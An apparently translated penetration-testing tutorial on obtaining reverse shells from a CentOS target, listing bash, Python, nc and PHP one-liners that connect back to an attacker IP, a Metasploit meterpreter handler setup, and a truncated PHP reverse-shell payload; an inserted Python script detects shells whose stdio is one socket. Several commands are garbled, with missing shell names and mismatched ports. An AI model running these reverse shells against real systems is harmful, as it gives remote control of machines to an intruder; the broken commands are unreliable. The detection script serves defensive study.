In penetration testing, the most common way to obtain a shell is to bounce one back over TCP or UDP, that is, a reverse connection.
Let's first clarify what forward and reverse connections are.
Forward connection: our machine connects to the target machine, as with ssh and mstsc.
Reverse connection: the target machine connects back to our machine.
So why is the reverse connection used more often?
The target machine sits in a LAN, so we cannot connect to it directly.
The target machine has a dynamic IP.
The target machine is behind a firewall.
Next, the lab environment used here:
Attacker machine: Kali Linux, 47.98.229.211
Target machine: CentOS 7, 149.129.68.117 (Alibaba Cloud server)
Method 1
This is also the most common way.
Kali listens:
nc -lvvp 4444
CentOS runs:
-i /dev/tcp/47.98.229.211/5555 01
After the command is executed, the shell bounces back successfully!
Method 2: python
Kali listens:
nc -lvvp 5555
CentOS runs:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/","-i"]);'
Method 3: nc
If nc is present on the target machine and it supports the -e option, a reverse shell can be created with it.
Kali listens:
nc -lvvp 5555
Target machine runs:
nc 47.98.229.211 5555 -t -e /bin/
This bounces the target machine's /bin/ to the attacker machine.
However, many Linux distributions ship a stripped-down nc. If the target machine has no nc, or its nc lacks the -e option, the nc method is not recommended.
Method 4: php
Kali listens:
nc -lvvp 4444
This requires php on the target machine; then run:
php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i 3 3 23");'
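All four methods end the same way: the shell's stdin, stdout and stderr are wired to one TCP socket (the dup2 calls in the Python variant, the redirections in the bash and PHP variants, -e in nc), which is what a defender can look for regardless of which one-liner was used. The following is an added example, not code from the original post: it walks /proc and flags shell-like processes whose descriptors 0, 1 and 2 all resolve to the same socket; the SHELL_LIKE set, fake_proc_entry and demo are my own constructions, and the sample /proc tree is constructed, not captured.

```python
import os
import re
import tempfile
from typing import Dict, Iterator, List, Optional, Tuple
# Under /proc/<pid>/fd, a socket-backed descriptor is a symlink to "socket:[<inode>]".
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")
# Shells/interpreters used by the methods above; daemons such as sshd legitimately
# have socket-backed stdio, so the process name is used to cut false positives.
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "python", "python3", "php", "nc"}

def stdio_socket_inode(fd_targets: Dict[int, str]) -> Optional[str]:
    """Return the socket link target if fds 0, 1 and 2 all point at the same socket."""
    targets = [fd_targets.get(fd, "") for fd in (0, 1, 2)]
    if len(set(targets)) != 1 or not SOCKET_RE.match(targets[0]):
        return None
    return targets[0]

def scan_proc(proc_root: str = "/proc") -> Iterator[Tuple[int, str, str]]:
    """Yield (pid, comm, socket) for shell-like processes whose stdio is one socket."""
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        pid_dir = os.path.join(proc_root, name)
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
            fds = {fd: os.readlink(os.path.join(pid_dir, "fd", str(fd))) for fd in (0, 1, 2)}
        except OSError:  # process gone, not ours to inspect, or an stdio fd is closed
            continue
        inode = stdio_socket_inode(fds)
        if comm in SHELL_LIKE and inode is not None:
            yield int(name), comm, inode

def fake_proc_entry(root: str, pid: int, comm: str, targets: Dict[int, str]) -> None:
    """Constructed /proc/<pid> lookalike so the scanner can be exercised offline."""
    fd_dir = os.path.join(root, str(pid), "fd")
    os.makedirs(fd_dir)
    with open(os.path.join(root, str(pid), "comm"), "w") as f:
        f.write(comm + "\n")
    for fd, target in targets.items():
        os.symlink(target, os.path.join(fd_dir, str(fd)))  # dangling, exactly like /proc

def demo() -> List[Tuple[int, str, str]]:
    """Constructed sample: one reverse shell, one terminal shell, one benign daemon."""
    with tempfile.TemporaryDirectory() as root:
        sock = {0: "socket:[41337]", 1: "socket:[41337]", 2: "socket:[41337]"}
        fake_proc_entry(root, 4242, "bash", sock)
        fake_proc_entry(root, 4243, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"})
        fake_proc_entry(root, 4244, "sshd", sock)
        return list(scan_proc(root))
```

On a live host run scan_proc() as root: descriptors of other users' processes are unreadable otherwise and those processes are silently skipped.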
Some other advanced tricks
About the PHP payload
First do a simple configuration in msfconsole:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
PHP?
php error_reporting(0); $ip='x.x.x.x'; $port=53; if (($f='stream_socket_client') is_callable($f)) {
{$port}'); $s_type='stream'; } if (!$s ($f='fsocckopen') is_callable($f)) { $s=$f($ip, $port); $s_
strlen($b)); break; case 'socket': $b .=socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock']=$s;
$GLOBALS['msgsock_type']=$s_type; if (extension_loaded('s